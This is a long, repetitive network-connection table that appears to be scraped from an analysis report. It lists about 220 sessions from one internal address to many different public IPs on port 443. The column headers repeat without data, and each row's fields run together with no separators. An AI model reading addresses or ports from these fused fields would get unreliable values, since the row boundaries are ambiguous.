                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15673192.168.2.133881057.204.109.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15674192.168.2.1344508180.5.238.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15675192.168.2.1356716179.24.194.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15676192.168.2.135197453.162.159.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15677192.168.2.1342396203.36.60.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15678192.168.2.134302459.215.208.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15679192.168.2.135735044.38.189.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15680192.168.2.1358554118.204.76.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15681192.168.2.13575665.93.213.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15682192.168.2.13448581.24.244.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15683192.168.2.1334280201.247.161.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15684192.168.2.1334772199.98.129.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15685192.168.2.134490052.4.207.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15686192.168.2.134164884.116.51.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15687192.168.2.135953062.116.72.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15688192.168.2.134109037.43.78.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15689192.168.2.135377058.15.129.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15690192.168.2.133980618.205.221.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15691192.168.2.1349034161.159.181.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15692192.168.2.133840265.98.202.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15693192.168.2.1336318154.90.122.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15694192.168.2.134108098.139.122.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15695192.168.2.1340654218.144.128.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15696192.168.2.1347788198.245.165.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15697192.168.2.1338776168.205.161.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15698192.168.2.1338418222.26.231.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15699192.168.2.1337856216.63.76.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15700192.168.2.13606161.90.16.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15701192.168.2.1350312135.67.222.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15702192.168.2.1346126221.77.10.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15703192.168.2.134643273.167.97.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15704192.168.2.134171658.47.140.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15705192.168.2.134766653.228.48.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15706192.168.2.134494282.77.117.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15707192.168.2.1347786181.9.83.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15708192.168.2.1346978180.87.168.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15709192.168.2.1339890154.66.92.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15710192.168.2.1359170184.12.18.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15711192.168.2.1347930219.57.209.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15712192.168.2.1356422221.97.207.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15713192.168.2.1336292164.248.131.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15714192.168.2.1347502176.0.56.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15715192.168.2.134179035.114.71.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15716192.168.2.1355164210.202.166.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15717192.168.2.135763618.160.176.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15718192.168.2.1358192105.109.225.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15719192.168.2.134988265.141.72.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15720192.168.2.1336396195.218.35.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15721192.168.2.134848851.134.222.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15722192.168.2.134021652.88.1.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15723192.168.2.1341124193.71.134.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15724192.168.2.135025671.136.132.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15725192.168.2.133390235.5.105.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15726192.168.2.1354422183.98.35.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15727192.168.2.1350926205.142.56.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15728192.168.2.135361650.131.56.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15729192.168.2.1335430124.27.238.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15730192.168.2.134704090.218.18.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15731192.168.2.1356296222.248.77.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15732192.168.2.135487675.240.99.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15733192.168.2.135911494.99.111.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15734192.168.2.1352106171.246.156.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15735192.168.2.1355322174.255.27.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15736192.168.2.1355746198.36.148.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15737192.168.2.1341474157.253.84.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15738192.168.2.1338094144.183.7.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15739192.168.2.1359516125.71.181.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15740192.168.2.1357422189.71.2.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15741192.168.2.1335222190.29.92.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15742192.168.2.1343954136.187.200.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15743192.168.2.133332853.186.191.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15744192.168.2.135226018.150.25.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15745192.168.2.1338174209.238.75.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15746192.168.2.1359020116.160.211.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15747192.168.2.1346674201.46.95.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15748192.168.2.1348080177.203.188.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15749192.168.2.136092853.121.9.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15750192.168.2.1341570139.183.111.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15751192.168.2.1348618128.88.81.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15752192.168.2.1356936156.96.214.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15753192.168.2.1336114182.89.24.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15754192.168.2.1332900183.57.207.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15755192.168.2.1343144202.156.148.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15756192.168.2.1341312146.54.43.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15757192.168.2.1350938159.15.13.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15758192.168.2.1347936203.38.145.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15759192.168.2.1336456104.108.12.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15760192.168.2.134876051.181.111.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15761192.168.2.1345976187.242.206.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15762192.168.2.1347144144.190.80.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15763192.168.2.134845236.177.47.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15764192.168.2.1349744107.223.30.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15765192.168.2.135660023.51.226.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15766192.168.2.1349564188.53.146.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15767192.168.2.1360862107.36.15.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15768192.168.2.1345006100.10.125.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15769192.168.2.1360588192.115.184.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15770192.168.2.1337238146.119.129.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15771192.168.2.1356074101.216.14.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15772192.168.2.1334840136.76.147.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15773192.168.2.135134667.48.165.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15774192.168.2.1353458159.22.179.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15775192.168.2.1356486114.155.3.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15776192.168.2.1359434155.86.216.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15777192.168.2.1343774188.18.2.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15778192.168.2.1352196161.199.45.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15779192.168.2.1359674137.178.35.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15780192.168.2.1343314183.14.135.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15781192.168.2.134393073.223.228.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15782192.168.2.1346586175.87.204.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15783192.168.2.1342460191.233.69.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15784192.168.2.134532031.180.137.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15785192.168.2.1351440176.26.50.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15786192.168.2.136012483.173.180.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15787192.168.2.1339636202.144.34.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15788192.168.2.1357838102.35.255.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15789192.168.2.1333672114.102.19.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15790192.168.2.1346426130.205.228.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15791192.168.2.13491369.81.85.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15792192.168.2.1342220105.213.169.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15793192.168.2.134218859.56.124.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15794192.168.2.1335016106.190.124.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15795192.168.2.1335590105.106.59.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15796192.168.2.135816831.64.194.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15797192.168.2.1348334199.33.134.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15798192.168.2.134725419.62.150.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15799192.168.2.135946225.219.180.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15800192.168.2.1348024221.117.42.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15801192.168.2.135206448.131.85.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15802192.168.2.1357816199.153.36.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15803192.168.2.1354186172.133.222.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15804192.168.2.1356314178.120.1.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15805192.168.2.134766688.51.183.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15806192.168.2.1353932143.146.11.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15807192.168.2.1353416205.174.6.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15808192.168.2.1344874184.244.132.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15809192.168.2.134862077.79.161.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15810192.168.2.134291693.79.103.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15811192.168.2.1355774190.54.84.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15812192.168.2.1355542200.240.60.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15813192.168.2.1345768160.178.177.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15814192.168.2.1354568189.99.154.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15815192.168.2.1344192184.171.250.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15816192.168.2.133988212.109.227.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15817192.168.2.135961235.168.4.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15818192.168.2.1334614167.68.9.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15819192.168.2.1357312187.60.176.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15820192.168.2.135064468.98.95.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15821192.168.2.133891877.231.160.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15822192.168.2.135987849.35.0.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15823192.168.2.1338196194.238.245.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15824192.168.2.134970445.163.61.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15825192.168.2.133621870.118.145.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15826192.168.2.1351344169.12.109.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15827192.168.2.1333522129.23.142.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15828192.168.2.1351264141.11.239.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15829192.168.2.136055447.224.5.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15830192.168.2.1355582141.217.65.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15831192.168.2.1352642149.184.99.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15832192.168.2.135586682.134.157.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15833192.168.2.1348042193.132.92.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15834192.168.2.1350022222.123.129.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15835192.168.2.1341210147.4.60.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15836192.168.2.1333236185.120.137.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15837192.168.2.133766819.189.16.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15838192.168.2.136043493.128.248.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15839192.168.2.1359422212.12.87.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15840192.168.2.1351772189.22.152.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15841192.168.2.1338208186.2.132.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15842192.168.2.1347364108.100.57.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15843192.168.2.1359684111.122.200.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15844192.168.2.134356037.130.223.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15845192.168.2.135466840.218.103.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15846192.168.2.1350700105.152.30.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15847192.168.2.1354506199.65.104.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15848192.168.2.1358406166.184.95.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15849192.168.2.134926476.100.58.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15850192.168.2.1339884208.40.73.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15851192.168.2.1346158132.176.209.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15852192.168.2.135881049.187.48.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15853192.168.2.1334638208.56.200.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15854192.168.2.135628436.215.92.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15855192.168.2.134040061.81.143.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15856192.168.2.1337468160.201.83.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15857192.168.2.1351698178.237.109.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15858192.168.2.133601667.40.242.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15859192.168.2.1337066141.200.218.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15860192.168.2.1357614100.145.184.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15861192.168.2.134904673.193.126.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15862192.168.2.1337054211.182.82.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15863192.168.2.1339156116.70.47.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15864192.168.2.134791024.58.51.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15865192.168.2.1354554136.6.58.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15866192.168.2.13410124.92.4.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15867192.168.2.135695445.217.222.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15868192.168.2.1358602169.67.210.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15869192.168.2.134783062.206.242.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15870192.168.2.1357132164.241.47.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15871192.168.2.134190287.192.142.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15872192.168.2.1343054199.201.154.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15873192.168.2.1348466217.56.233.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15874192.168.2.1345858171.47.244.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15875192.168.2.134251639.125.195.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15876192.168.2.1344680153.56.46.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15877192.168.2.135925224.154.93.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15878192.168.2.1359576145.116.21.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15879192.168.2.135124880.223.219.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15880192.168.2.1343814217.19.115.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15881192.168.2.134026071.61.71.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15882192.168.2.1336394194.101.10.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15883192.168.2.1335002222.159.38.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15884192.168.2.135122093.233.78.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15885192.168.2.135055489.115.55.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15886192.168.2.1355580220.108.160.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15887192.168.2.1342094152.55.50.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15888192.168.2.1349158122.118.181.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15889192.168.2.134565485.4.205.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15890192.168.2.135840068.17.209.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15891192.168.2.1343274162.75.95.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15892192.168.2.1360968100.202.245.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15893192.168.2.1360034208.105.210.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
